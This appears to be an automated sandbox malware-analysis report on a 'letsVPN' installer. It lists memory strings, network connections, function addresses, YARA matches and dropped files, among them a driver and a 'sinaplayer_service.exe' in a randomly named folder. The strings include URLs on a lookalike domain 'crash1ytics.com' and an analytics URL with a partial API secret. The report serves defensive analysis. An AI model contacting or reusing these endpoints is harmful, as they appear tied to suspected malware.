              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/deviceError
              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicechecking
              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/device
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://pngimg.com/uploads/light/light_PNG14440.png
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://widget.intercom.io/widget/
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: LetsPRO.exe, 00000038.00000002.3942255684.00000000389B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/mp/collect?measurement_id=G-G4T2PRPBD9&api_secret=g51
              Source: LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00405705
              Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.0-------------- 0601021504Z0700114.114.114.114126.255.255.254169.254.255.255191.255.255.254223.255.255.254255.255.255.248476837158203125: cannot parse : no frame (sp=; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAccount-ExpiredAccount-TimeoutAddDllDirectoryAddMandatoryAceAreFileApisANSIBP_BUFFERFORMATBackupEventLogWCLSIDFromProgIDCLSIDFromStringCOLORADJUSTMENTCOMPOSITIONFORMCRYPTOAPI_BLOB_CRYPT_ATTRIBUTECRYPT_ATTR_BLOBCRYPT_DATA_BLOBCRYPT_HASH_BLOBCallWindowProcWClientAuthType(CoInitializeWOWColorAdjustLumaCompareFileTimeControl_RunDLLWCreateDataCacheCreateErrorInfoCreateHardLinkWCreateMailslotWCreateMetaFileWCreatePopupMenuCreateToolbarExCreateWindowExWCryptCreateHashCryptDestroyKeyCryptGetUserKeyCryptMemReallocCryptMsgControlDAD_DragEnterExDESKTOPENUMPROCDdeGetLastErrorDdeQueryStringWDdeUnaccessDataDdeUninitializeDefRawInputProcDefSubclassProcDeleteIPAddressDestinationAddrDeviceIoControlDialogBoxParamWDlgDirSelectExWDnsPolicyConfigDownload-FailedDragAcceptFilesDrawMenuBarTempDrawStatusTextWDrawThemeTextExDuplicateHandleECDSAP256SHA256ECDSAP384SHA384ENG_TIME_FIELDSENUMLOGFONTEXDVENUMRESLANGPROCEXPLICIT_ACCESSEmptyWorkingSetEnableScrollBarEngCreateBitmapEngEraseSurfaceEngFindResourceEngGradientFillEnumEnhMetaFileExcludeClipRectExtCreateRegionFailed to find Failed to load FindExecutableWFindNextStreamWFindNextVolumeWFindResourceExWFindVolumeCloseFlush dns cacheFlushIpNetTableFlushViewOfFileFreeAddrInfoExWGENERIC_MAPPINGGateway TimeoutGdiGradientFillGdiIsMetaFileDCGetActiveObjectGetActiveWindowGetAdapterIndexGetAdaptersInfoGetArcDirectionGetCharWidth32WGetClassInfoExWGetComboBoxInfoGetCommTimeoutsGetCommandLineWGetDCBrushColorGetDateFormatExGetDlgItemTextWGetEnhMetaFileWGetGraphicsModeGetGuiResourcesGetIpStatisticsGetKeyNameTextWGetKeyboardTypeGetLocaleInfoExGetMailslotInfoGetMenuItemRectGetMonitorInfoWGetNearestColorGetPolyFillModeGetProcessHeapsGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTapePositionGetTextMetricsWGetThemeIntListGetThemeMarginsGetThemeSysBoolGetThemeSysFontGetThemeSysSizeGetThreadLocaleGetTimeFormatExGetTitleBarInfoGetTrusteeFormWGetTrusteeNameWGetTrusteeTypeWGetWindowRgnBoxGlobalFindAtomWHanifi_RohingyaHasIPPacketInfoHost-Block-ListHost-Local-ListICreateTypeLib2IMEMENUITEMINFOIO_STATUS_BLOCKIP-Country-ListIP-Queue-LengthIP_ADAPTER_INFOIPersistStorageIShellItemArrayI_CryptAllocTlsI_RpcFreeBufferIcmp6CreateFileIcmpCloseHandleIcmpSendEcho2ExIdempotency-KeyImageList_MergeImageList_WriteImmIsUIMessageWImpersonateSelfInSendMessageExInitMUILanguageInsertMenuItemWIsBadStringPtrWIsHungAppWindowIsValidCodePageIsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2K32GetWsChangesKillSystemTimerLPCONDITIONPROCLPENUMFORMATETCLPFNDFMCALLBACKLPLOGCOLORSPACELPMESSAGEFILTERLPOLECLIENTSITELPPAGEPAINTHOOKLPPAGESETUPHOOKLPPRINTHOOKPROCLPSETUPHOOKPROCLPSHQUERYRBINFOLPWSAOVERLAPPEDLWBTBVCITWI2025Length RequiredLoadLibraryExAmemstr_54339ad2-d
              Source: Yara matchFile source: 56.2.LetsPRO.exe.682d0000.21.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: letsvpn-latest.exe PID: 8108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, type: DROPPED
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.cat (copy)Jump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.cat (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.catJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC4B.tmpJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAD4.tmpJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00381660: CreateFileW,DeviceIoControl,CloseHandle,17_2_00381660
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,19_2_0040351C
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETC543.tmp
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETC543.tmp
              Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC3A.tmp
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000CA800_2_000000018000CA80
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD0_2_00000001800057CD
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000583A0_2_000000018000583A
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800230400_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001A9B80_2_000000018001A9B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800152640_2_0000000180015264
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800192C80_2_00000001800192C8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180027AD40_2_0000000180027AD4
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000B35C0_2_000000018000B35C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180009BBC0_2_0000000180009BBC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001BBCD0_2_000000018001BBCD
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001AD680_2_000000018001AD68
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D700_2_0000000180010D70
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180017E2C0_2_0000000180017E2C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001DE340_2_000000018001DE34
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800236640_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001FF380_2_000000018001FF38
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180025F480_2_0000000180025F48
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800267AC0_2_00000001800267AC
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038305017_2_00383050
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0039522017_2_00395220
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0039338017_2_00393380
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038340017_2_00383400
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038353017_2_00383530
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003855B017_2_003855B0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003858F817_2_003858F8
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038395017_2_00383950
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00384B4017_2_00384B40
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00382D1017_2_00382D10
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00383FD017_2_00383FD0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57AD6C17_2_6C57AD6C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56ADE517_2_6C56ADE5
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C610DB317_2_6C610DB3
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E4DB217_2_6C5E4DB2
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C560EAC17_2_6C560EAC
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C560F3817_2_6C560F38
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C574FC617_2_6C574FC6
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56A8CA17_2_6C56A8CA
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57EA8017_2_6C57EA80
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E2AA917_2_6C5E2AA9
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E8B4117_2_6C5E8B41
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C6104C217_2_6C6104C2
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56E5DD17_2_6C56E5DD
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E07DD17_2_6C5E07DD
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57018917_2_6C570189
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C6242D817_2_6C6242D8
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5943CE17_2_6C5943CE
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5F63C717_2_6C5F63C7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5C1D6D17_2_6C5C1D6D
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C601E6017_2_6C601E60
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C581E4B17_2_6C581E4B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C623EE517_2_6C623EE5
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C567F5A17_2_6C567F5A
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56B87917_2_6C56B879
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5FB93017_2_6C5FB930
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57BA7817_2_6C57BA78
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E1AB717_2_6C5E1AB7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5E3BAC17_2_6C5E3BAC
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57D40E17_2_6C57D40E
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56B42B17_2_6C56B42B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57348617_2_6C573486
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5FD5A817_2_6C5FD5A8
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C58D6F317_2_6C58D6F3
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C60B71017_2_6C60B710
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C58700417_2_6C587004
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C56B08217_2_6C56B082
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C62716017_2_6C627160
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5ED1F817_2_6C5ED1F8
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C58320E17_2_6C58320E
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C59B38917_2_6C59B389
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C60738417_2_6C607384
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00406C5F19_2_00406C5F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00C8B4B824_2_00C8B4B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00C8B4A824_2_00C8B4A8
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A24C828_2_00007FF7132A24C8
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A354C28_2_00007FF7132A354C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A653428_2_00007FF7132A6534
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A4B7428_2_00007FF7132A4B74
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0086789753_2_00867897
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085B18B53_2_0085B18B
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0086392953_2_00863929
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085A95F53_2_0085A95F
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00857B9153_2_00857B91
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085AC0953_2_0085AC09
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085A5ED53_2_0085A5ED
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085A54053_2_0085A540
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00862D5553_2_00862D55
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085AED053_2_0085AED0
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_054437D054_2_054437D0
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0588A04854_2_0588A048
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0588A0DF54_2_0588A0DF
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0588A9EB54_2_0588A9EB
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0588632F54_2_0588632F
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_058867F654_2_058867F6
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05B633B954_2_05B633B9
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05B6699854_2_05B66998
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05B6327654_2_05B63276
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D344654_2_012D3446
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D8C5054_2_012D8C50
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D4C9854_2_012D4C98
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D8C5054_2_012D8C50
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0587CD7854_2_0587CD78
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05A79E8854_2_05A79E88
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_0588760D54_2_0588760D
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_058875DB54_2_058875DB
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_058875F454_2_058875F4
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05B65D9D54_2_05B65D9D
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess token adjusted: Load Driver
